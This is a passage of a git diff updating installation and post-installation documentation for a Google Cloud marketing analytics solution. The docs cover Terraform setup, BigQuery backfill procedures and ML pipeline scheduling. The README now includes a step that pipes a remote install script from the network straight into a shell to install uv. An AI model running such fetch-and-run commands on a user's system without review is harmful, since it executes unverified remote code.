"zh:9c7bf8c56da1b124e0e2f3210a1915e778bab2be924481af684695b52672891e", + "zh:d2200f7f6ab8ecb8373cda796b864ad4867f5c255cff9d3b032f666e4c78f625", + "zh:d8c7926feaddfdc08d5ebb41b03445166df8c125417b28d64712dccd9feef136", + "zh:e2412a192fc340c61b373d6c20c9d805d7d3dee6c720c34db23c2a8ff0abd71b", + "zh:e6ac6bba391afe728a099df344dbd6481425b06d61697522017b8f7a59957d44", + ] +} diff --git a/infrastructure/terraform/POST-INSTALLATION.md b/infrastructure/terraform/POST-INSTALLATION.md new file mode 100644 index 00000000..a4445fb3 --- /dev/null +++ b/infrastructure/terraform/POST-INSTALLATION.md @@ -0,0 +1,196 @@ + +## Post-Installation Guide + +Now that you have deployed all assets successfully in your Google Cloud Project, you may want to plan for operating the solution to be able to generate the predictions you need to create the audience segments you want for you Ads campaigns. To accomplish that, you gonna to plan a few things. + +First, you need to choose what kind of insight you are looking for to define the campaigns. Here are a few insights provided by each one of the use cases already provided to you: + +- **Aggregated Value Based Bidding ([value_based_bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L514))**: Attributes a numerical value to high value conversion events (user action) in relation to a target conversion event (typically purchase) so that Google Ads can improve the bidding strategy for users that reached these conversion events, as of now. +- **Demographic Audience Segmentation ([audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L929))**: Attributes a cluster segment to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back. +- **Interest based Audience Segmentation ([auto_audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1018))**: Attributes a cluster segment to an user using pages navigations data looking XX days back, as of now. +- **Purchase Propensity ([purchase_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L629))**: Predicts a purchase propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. +- **Customer Lifetime Value ([customer_ltv](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1215))**: Predicts a lifetime value gain decile and a lifetime value revenue gain in USD (equal of bigger than 0.0) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX-XXX days back to predict XX days ahead, as of now. +- **Churn Propensity ([churn_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L779))**: Predicts a churn propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. + +Second, you need to measure how much data you are going to use to obtain the insights you need. Each one of the use cases above requires data in the following intervals, using as key metrics number of days and unique user events. + +- **Aggregated Value Based Bidding ([value_based_bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1734))**: Minimum 30 days and maximum 1 year. The number of unique user events is not a key limitation. Note that you need at least 1000 training examples for the model to be trained successfully, to accomplish that we typically duplicate the rows until we have a minimum of 1000 rows in the training table for the "TRAIN" subset. +- **Demographic Audience Segmentation ([audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1779))**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). +- **Interest based Audience Segmentation ([auto_audience_segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1817))**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). +- **Purchase Propensity ([purchase_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1739))**: Minimum 90 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). +- **Customer Lifetime Value ([customer_lifetime_value](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1798))**: Minimum 180 days and maximum 5 years. Minimum of 1000 unique user events per day, of which a minimum of 1 event per week that increases the lifetime value for an user. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). +- **Churn Propensity ([churn_propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1758))**: Minimum 30 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). + +Third, the data must be processed by the Marketing Data Store; features must be prepared using the Feature Engineering procedure; and the training and inference pipelines must be triggered. For that, open your `config.yaml.tftpl` configuration file and check the `{pipeline-name}.execution.schedule` block to modify the scheduled time for each pipeline you are going to need to orchestrate that enables your use case. Here is a table of pipelines configuration you need to enable for every use case. + +| Use Case | Pipeline Configuration | +| -------- | ---------------------- | +| **Aggregated Value Based Bidding** | [feature-creation-aggregated-value-based-bidding](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L473)
[value_based_bidding.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L515)
[value_based_bidding.explanation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L591) | +| **Demographic Audience Segmentation** | [feature-creation-audience-segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L248)
[segmentation.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L930)
[segmentation.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L973) | +| **Interest based Audience Segmentation** | [feature-creation-auto-audience-segmentation](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L170)
[auto_segmentation.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1019)
[auto_segmentation.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1061) | +| **Purchase Propensity** | [feature-creation-purchase-propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L315)
[purchase_propensity.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L630)
[purchase_propensity.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L725) | +| **Customer Lifetime Value** | [feature-creation-customer-ltv](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L419)
[propensity_clv.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1110)
[clv.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1221)
[clv.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L1309) | +| **Churn Propensity** | [feature-creation-churn-propensity](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L370)
[churn_propensity.training](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L780)
[churn_propensity.prediction](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/config/config.yaml.tftpl#L875) | + +After you change these configurations, make sure you apply these changes in your deployed resources by re-running terraform. + +```bash +terraform -chdir="${TERRAFORM_RUN_DIR}" apply +``` + +You can trigger your Cloud Workflow to execute your Dataform workflow at any time, or you can wait until the next day when the Cloud Workflow is going to be executed according to your schedule. There are two components in this solution that requires data for proper installation and functioning. One is the Looker Studio Dashboard, you only deploy the dashboard after you have executed all the steps in this Guide successfully. Another is the ML pipeline, the pipelines compilation requires views and tables to be created so that it can read their schema and define the column transformations to run during the pipeline execution. + +To manually start the data flow you must perform the following tasks: + +1. Run the Cloud Workflow + + On the Google Cloud console, navigate to Workflows page. You will see a Workflow named `dataform-prod-incremental`, then under Actions, click on the three dots and `Execute` the Workflow. + + **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 and Ads BigQuery datasets, it can take several minutes or hours to process all the data. Make sure that the processing has completed successfully before you continue to the next step. + +1. Invoke the BigQuery stored procedures having the prefix `invoke_backfill_*` to backfill the feature store in case the GA4 Export has been enabled before installing Marketing Analytics Jumpstart. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## There is no need to backfill the aggregated value based bidding features since there + ## is no aggregations performed before training. The transformation was applied in the + ## Marketing Data Store + + ## Backfill customer ltv tables + CALL `feature_store.invoke_backfill_customer_lifetime_value_label`(); + CALL `feature_store.invoke_backfill_user_lifetime_dimensions`(); + CALL `feature_store.invoke_backfill_user_rolling_window_lifetime_metrics`(); + + ## Backfill purchase propensity tables + CALL `feature_store.invoke_backfill_user_dimensions`(); + CALL `feature_store.invoke_backfill_user_rolling_window_metrics`(); + CALL `feature_store.invoke_backfill_purchase_propensity_label`(); + + ## Backfill audience segmentation tables + CALL `feature_store.invoke_backfill_user_segmentation_dimensions`(); + CALL `feature_store.invoke_backfill_user_lookback_metrics`(); + + ## There is no need to backfill the auto audience segmentation features since + ## they are dynamically prepared in the feature engineering pipeline using + ## python code + + ## Backfill churn propensity tables + ## This use case reuses the user_dimensions and user_rolling_window_metrics, + ## make sure you invoke the backfill for these tables. CALLs are listed above + ## under backfill purchase propensity + CALL `feature_store.invoke_backfill_churn_propensity_label`(); + + ## Backfill for gemini insights + CALL `feature_store.invoke_backfill_user_scoped_metrics`(); + CALL `gemini_insights.invoke_backfill_user_behaviour_revenue_insights`(); + ``` + + **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 BigQuery datasets over the last six months, it can take several hours to backfill the feature data so that you can train your ML model. Make sure that the backfill procedures starts without errors before you continue to the next step. + +1. Check whether the feature store tables you have run backfill have rows in it. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## There are no tables used by the aggregated value based bidding use case + ## in the feature store. + + ## Checking customer ltv tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.customer_lifetime_value_label`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lifetime_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_lifetime_metrics`; + + ## Checking purchase propensity tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.purchase_propensity_label`; + + ## Checking audience segmentation tables are not empty + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_segmentation_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lookback_metrics`; + + ## There are no tables used by the auto audience segmentation use case + ## in the feature store. + + ## Checking churn propensity tables are not empty + ## This use case reuses the user_dimensions and user_rolling_window_metrics, + ## make sure you invoke the backfill for these tables. CALLs are listed above + ## under the instructions for backfill purchase propensity + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; + SELECT COUNT(user_pseudo_id) FROM `feature_store.churn_propensity_label`; + + ## Checking gemini insights tables are not empty + SELECT COUNT(feature_date) FROM `feature_store.user_scoped_metrics`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_daily`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_weekly`; + SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_monthly`; + ``` + +1. Redeploy the ML pipelines using Terraform. + + On your code editor, change the variable `deploy_pipelines` from `true` to `false`, on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars`. + Next, undeploy the ML pipelines component by applying the terraform configuration. + + ```bash + terraform -chdir="${TERRAFORM_RUN_DIR}" apply + ``` + + Now, to deploy the ML pipelines component again, revert your changes on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars` and apply the terraform configuration by running the commad above again. + + **Note:** The training pipelines use schemas defined by a `custom_transformations` parameter in your `config.yaml` or by the training table/view schema itself. + So at first, during the first deployment i.e. `tf apply`, because the views are not created yet, we assume a fixed schema in case no `custom_transformations` parameter is provided. + Then, you need to redeploy to make sure that since all the table views exist now, redeploy the pipelines to make sure you fetch the right schema to be provided to the training pipelines. + +1. Once the feature store is populated and the pipelines are redeployed, manually invoke the BigQuery procedures for preparing the training datasets, which have the suffix `_training_preparation`. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## Training preparation for Aggregated Value Based Bidding + CALL `aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation`(); + + ## Training preparation for Customer Lifetime Value + CALL `customer_lifetime_value.invoke_customer_lifetime_value_training_preparation`(); + + ## Training preparation for Purchase Propensity + CALL `purchase_propensity.invoke_purchase_propensity_training_preparation`(); + + ## Training preparation for Audience Segmentation + CALL `audience_segmentation.invoke_audience_segmentation_training_preparation`(); + + ## Training preparation for Auto Audience Segmentation + CALL `auto_audience_segmentation.invoke_auto_audience_segmentation_training_preparation`(); + + ## Training preparation for Churn Propensity + CALL `churn_propensity.invoke_churn_propensity_training_preparation`(); + + ## There is no need to prepare training data for the gemini insights use case. + ## Gemini insights only require feature engineering the inference pipelines. + ## The gemini insights are saved in the gemini insights dataset, specified in the `config.yaml.tftpl` file. + ``` + +1. Check whether the training preparation tables you have run the procedures above have rows in it. + + On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. + ```sql + ## Checking aggregated value based bidding tables are not empty. + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT * FROM `aggregated_vbb.aggregated_value_based_bidding_training_full_dataset`; + + ## Checking customer ltv tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `customer_lifetime_value.customer_lifetime_value_training_full_dataset`; + + ## Checking purchase propensity tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `purchase_propensity.purchase_propensity_training_full_dataset`; + + ## Checking audience segmentation tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `audience_segmentation.audience_segmentation_training_full_dataset`; + + ## Checking churn propensity tables are not empty + ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. + SELECT COUNT(user_pseudo_id) FROM `churn_propensity.churn_propensity_training_full_dataset`; + ``` + +Your Marketing Analytics Jumpstart solution is ready for daily operation. Plan for the days you want your model(s) to be trained, change the scheduler dates in the `config.yaml.tftpl` file or manually trigger training whenever you want. For more information, read the documentations in the [docs/ folder](../../docs/). diff --git a/infrastructure/terraform/README.md b/infrastructure/terraform/README.md index 793f9419..fcbb9246 100644 --- a/infrastructure/terraform/README.md +++ b/infrastructure/terraform/README.md @@ -1,11 +1,13 @@ -# Terraform Scripts +# Manual Installation of Terraform Modules -The Terraform scripts in this folder create the infrastructure to start data ingestion -into BigQuery, create feature store, ML pipelines and Dataflow activation pipeline. +The Terraform scripts in this folder and subfolders create the infrastructure to start data ingestion +into BigQuery, create feature store, run ML pipelines and Dataflow activation application. ## Prerequisites -Make sure the prerequisites listed in the [parent README](../README.md) are met. You can run the script +Make sure the prerequisites listed in the [parent README](../README.md) are met. + +You can run the script from [Cloud Shell](https://cloud.google.com/shell/docs/using-cloud-shelld.google.com/shell/docs/using-cloud-shell) or a Linux machine or a Mac with `gcloud` command installed. The instructions provided are for the Cloud Shell installation. @@ -16,10 +18,11 @@ have plenty of disk space before continuing the installation. If that is not your case, following the Cloud Shell documentation to [reset your Cloud Shell](https://cloud.google.com/shell/docs/resetting-cloud-shell). -## Installation Guide -Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +## Manual Installation Guide + +In this section, you find all the detailed steps required for you to manually install the Marketing Analytics Jumpstart solution. Following this process, you have greater flexibility and customization allowing you to choose which components of the solution you want to use or not. -**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. +Also, this method allows you to extend this solution and develop it to satisfy your own needs. ### Initial Environment Setup @@ -40,51 +43,18 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com gcloud config set project $PROJECT_ID ``` -1. Install or update Python3 - Install a compatible version of Python 3.8-3.10 and set the CLOUDSDK_PYTHON environment variable to point to it. +1. Install update uv for running python scripts + Install [uv](https://docs.astral.sh/uv/) that manages the python version and dependecies for the solution. - ```bash - sudo apt-get install python3.10 - CLOUDSDK_PYTHON=python3.10 + ```sh + curl -LsSf https://astral.sh/uv/install.sh | sh + export PATH="$HOME/.local/bin:$PATH" ``` - If you are installing on a Mac: - ```shell - brew install python@3.10 - CLOUDSDK_PYTHON=python3.10 - ``` -1. Install Python's Poetry and set Poetry to use Python3.8-3.10 version - - [Poetry](https://python-poetry.org/docs/) is a Python's tool for dependency management and packaging. - - If you are installing on in Cloud Shell use the following commands: - ```shell - pipx install poetry - ``` - If you don't have pipx installed - follow the [Pipx installation guide](https://pipx.pypa.io/stable/installation/) - ```shell - sudo apt update - sudo apt install pipx - pipx ensurepath - ``` - Verify that `poetry` is on your $PATH variable: - ```shell - poetry --version - ``` - If it fails - add it to your $PATH variable: - ```shell - export PATH="$HOME/.local/bin:$PATH" - ``` - If you are installing on a Mac: - ```shell - brew install poetry - ``` - Set poetry to use your latest python3 - ```shell - SOURCE_ROOT=${HOME}/${REPO} - cd ${SOURCE_ROOT} - poetry env use python3 - ``` + Check uv installation: + ```sh + uv --version + ``` 1. Authenticate with additional OAuth 2.0 scopes needed to use the Google Analytics Admin API: ```shell @@ -102,7 +72,7 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com 1. Review your Terraform version - Make sure you have installed terraform version is 1.5.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. + Make sure you have installed terraform version is 1.9.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. `Tfenv` is a version manager inspired by rbenv, a Ruby programming language version manager. To install `tfenv`, run the following commands: @@ -112,14 +82,22 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com # Follow instructions on https://github.com/tfutils/tfenv # Now, install the recommended terraform version - tfenv install 1.5.7 - tfenv use 1.5.7 + tfenv install 1.9.7 + tfenv use 1.9.7 terraform --version ``` + **Note:** If you have a Apple Silicon Macbook, you should install terraform by setting the `TFENV_ARCH` environment variable: + ```shell + TFENV_ARCH=amd64 tfenv install 1.9.7 + tfenv use 1.9.7 + terraform --version + ``` + If not properly terraform version for your architecture is installed, `terraform .. init` will fail. + For instance, the output on MacOS should be like: ```shell - Terraform v1.5.7 + Terraform v1.9.7 on darwin_amd64 ``` @@ -128,6 +106,7 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com Terraform stores state about managed infrastructure to map real-world resources to the configuration, keep track of metadata, and improve performance. Terraform stores this state in a local file by default, but you can also use a Terraform remote backend to store state remotely. [Remote state](https://developer.hashicorp.com/terraform/cdktf/concepts/remote-backends) makes it easier for teams to work together because all members have access to the latest state data in the remote store. ```bash + SOURCE_ROOT="${HOME}/${REPO}" cd ${SOURCE_ROOT} scripts/generate-tf-backend.sh ``` @@ -158,14 +137,23 @@ Step by step installation guide with [![Open in Cloud Shell](https://gstatic.com or in multi-regions by assigning value such as * `US` or `EU` -1. Run Terraform to create resources: +1. Run Terraform to initialize your environment, and validate if your configurations and variables are set as expected: ```bash terraform -chdir="${TERRAFORM_RUN_DIR}" init - terraform -chdir="${TERRAFORM_RUN_DIR}" apply + terraform -chdir="${TERRAFORM_RUN_DIR}" plan + terraform -chdir="${TERRAFORM_RUN_DIR}" validate ``` - If you don't have a successful execution from the beginning, re-run until all is deployed successfully. + If you run into errors, review and edit the `${TERRAFORM_RUN_DIR}/terraform.tfvars` file. However, if there are still configuration errors, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +1. Run Terraform to create resources: + + ```bash + terraform -chdir="${TERRAFORM_RUN_DIR}" apply + ``` + + If you don't have a successful execution of certain resources, re-run `terraform -chdir="${TERRAFORM_RUN_DIR}" apply` a few more times until all is deployed successfully. However, if there are still resources not deployed, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). ### Resume terminal session @@ -175,10 +163,10 @@ Because a Cloud Shell session is ephemeral, your Cloud Shell session could termi Reset your Google Cloud Project ID variables: - ```shell - export PROJECT_ID="[your Google Cloud project id]" - gcloud config set project $PROJECT_ID - ``` + ```bash + export PROJECT_ID="[your Google Cloud project id]" + gcloud config set project $PROJECT_ID + ``` Follow the authentication workflow, since your credentials expires daily: @@ -213,198 +201,12 @@ At this time, the Terraform scripts in this folder perform the following tasks: - Dataform repository connected to the GitHub repo - Deploys the marketing data store (MDS), feature store, ML pipelines and activation application -The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md). +## Next Steps -## Post-Installation Instructions +Follow the [post-installation guide](./POST-INSTALLATION.md) to start you daily operations. -Now that you have deployed all assets successfully in your Google Cloud Project, you may want to plan for operating the solution to be able to generate the predictions you need to create the audience segments you want for you Ads campaigns. To accomplish that, you gonna to plan a few things. +It is recommended to follow the post-installation guide before deploying the Looker Studio Dashboard, because you need the data and predictions tables to exist before consuming insights in your reports. -First, you need to choose what kind of insight you are looking for to define the campaigns. Here are a few insights provided by each one of the use cases already provided to you: +**The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md).** -- **Aggregated Value Based Bidding**: Attributes a numerical value to high value conversion events (user action) in relation to a target conversion event (typically purchase) so that Google Ads can improve the bidding strategy for users that reached these conversion events, as of now. -- **Demographic Audience Segmentation**: Attributes a cluster segment to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back. -- **Interest based Audience Segmentation**: Attributes a cluster segment to an user using pages navigations data looking XX days back, as of now. -- **Purchase Propensity**: Predicts a purchase propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. -- **Customer Lifetime Value**: Predicts a lifetime value gain decile and a lifetime value revenue gain in USD (equal of bigger than 0.0) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX-XXX days back to predict XX days ahead, as of now. -- **Churn Propensity**: Predicts a churn propensity decile and a propensity score (likelihood between 0.0 - 0% and 1.0 - 100%) to an user using demographics data, including geographic location, device, traffic source and windowed user metrics looking XX days back to predict XX days ahead, as of now. - -Second, you need to measure how much data you are going to use to obtain the insights you need. Each one of the use cases above requires data in the following intervals, using as key metrics number of days and unique user events. - -- **Aggregated Value Based Bidding**: Minimum 30 days and maximum 1 year. The number of unique user events is not a key limitation. Note that you need at least 1000 training examples for the model to be trained successfully, to accomplish that we typically duplicate the rows until we have a minimum of 1000 rows in the training table for the "TRAIN" subset. -- **Demographic Audience Segmentation**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Interest based Audience Segmentation**: Minimum 30 days and maximum 1 year. Minimum of 1000 unique user events per day. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Purchase Propensity**: Minimum 90 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Customer Lifetime Value**: Minimum 180 days and maximum 5 years. Minimum of 1000 unique user events per day, of which a minimum of 1 event per week that increases the lifetime value for an user. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). -- **Churn Propensity**: Minimum 30 days and maximum 2 years. Minimum of 1000 unique user events per day, of which a minimum of 1 target event per week. Note that you don't need more than 1M training examples for the model to perform well, make sure your training table doesn't contain more training examples than you need by applying exclusion clauses (i.e. WHERE, LIMIT clauses). - -Third, the data must be processed by the Marketing Data Store; features must be prepared using the Feature Engineering procedure; and the training and inference pipelines must be triggered. For that, open your `config.yaml.tftpl` configuration file and check the `{pipeline-name}.execution.schedule` block to modify the scheduled time for each pipeline you gonna need to orchestrate that enables your use case. Here is a list of pipelines you need for every use case. - -- **Aggregated Value Based Bidding**: `feature-creation-aggregated-value-based-bidding`, `value_based_bidding.training`, `value_based_bidding.explanation` -- **Demographic Audience Segmentation**: `feature-creation-audience-segmentation`, `segmentation.training`, `segmentation.prediction` -- **Interest based Audience Segmentation**: `feature-creation-auto-audience-segmentation`, `auto_segmentation.training`, `auto_segmentation.prediction` -- **Purchase Propensity**: `feature-creation-purchase-propensity`, `purchase_propensity.training`, `purchase_propensity.prediction` -- **Customer Lifetime Value**: `feature-creation-customer-ltv`, `propensity_clv.training`, `clv.training`, `clv.prediction` -- **Churn Propensity**: `feature-creation-churn-propensity`, `churn_propensity.training`, `churn_propensity.prediction` - -After you change these configurations, make sure you apply these changes in your deployed resources by re-running terraform. - -```bash -terraform -chdir="${TERRAFORM_RUN_DIR}" apply -``` - -You can trigger your Cloud Workflow to execute your Dataform workflow at any time, or you can wait until the next day when the Cloud Workflow is going to be executed according to your schedule. There are two components in this solution that requires data for proper installation and functioning. One is the Looker Studio Dashboard, you only deploy the dashboard after you have executed all the steps in this Guide successfully. Another is the ML pipeline, the pipelines compilation requires views and tables to be created so that it can read their schema and define the column transformations to run during the pipeline execution. - -To manually start the data flow you must perform the following tasks: - -1. Run the Cloud Workflow - - On the Google Cloud console, navigate to Workflows page. You will see a Workflow named `dataform-prod-incremental`, then under Actions, click on the three dots and `Execute` the Workflow. - - **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 and Ads BigQuery datasets, it can take several minutes or hours to process all the data. Make sure that the processing has completed successfully before you continue to the next step. - -1. Invoke the BigQuery stored procedures having the prefix `invoke_backfill_*` to backfill the feature store in case the GA4 Export has been enabled before installing Marketing Analytics Jumpstart. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## There is no need to backfill the aggregated value based bidding features since there - ## is no aggregations performed before training. The transformation was applied in the - ## Marketing Data Store - - ## Backfill customer ltv tables - CALL `feature_store.invoke_backfill_customer_lifetime_value_label`(); - CALL `feature_store.invoke_backfill_user_lifetime_dimensions`(); - CALL `feature_store.invoke_backfill_user_rolling_window_lifetime_metrics`(); - - ## Backfill purchase propensity tables - CALL `feature_store.invoke_backfill_user_dimensions`(); - CALL `feature_store.invoke_backfill_user_rolling_window_metrics`(); - CALL `feature_store.invoke_backfill_purchase_propensity_label`(); - - ## Backfill audience segmentation tables - CALL `feature_store.invoke_backfill_user_segmentation_dimensions`(); - CALL `feature_store.invoke_backfill_user_lookback_metrics`(); - - ## There is no need to backfill the auto audience segmentation features since - ## they are dynamically prepared in the feature engineering pipeline using - ## python code - - ## Backfill churn propensity tables - ## This use case reuses the user_dimensions and user_rolling_window_metrics, - ## make sure you invoke the backfill for these tables. CALLs are listed above - ## under backfill purchase propensity - CALL `feature_store.invoke_backfill_churn_propensity_label`(); - - ## Backfill for gemini insights - CALL `feature_store.invoke_backfill_user_scoped_metrics`(); - CALL `gemini_insights.invoke_backfill_user_behaviour_revenue_insights`(); - ``` - - **Note:** If you have a considerable amount of data (>XXX GBs of data) in your exported GA4 BigQuery datasets over the last six months, it can take several hours to backfill the feature data so that you can train your ML model. Make sure that the backfill procedures starts without errors before you continue to the next step. - -1. Check whether the feature store tables you have run backfill have rows in it. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## There are no tables used by the aggregated value based bidding use case - ## in the feature store. - - ## Checking customer ltv tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.customer_lifetime_value_label`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lifetime_dimensions`; - SELECT COUNT(user_pseudo_id) FROM 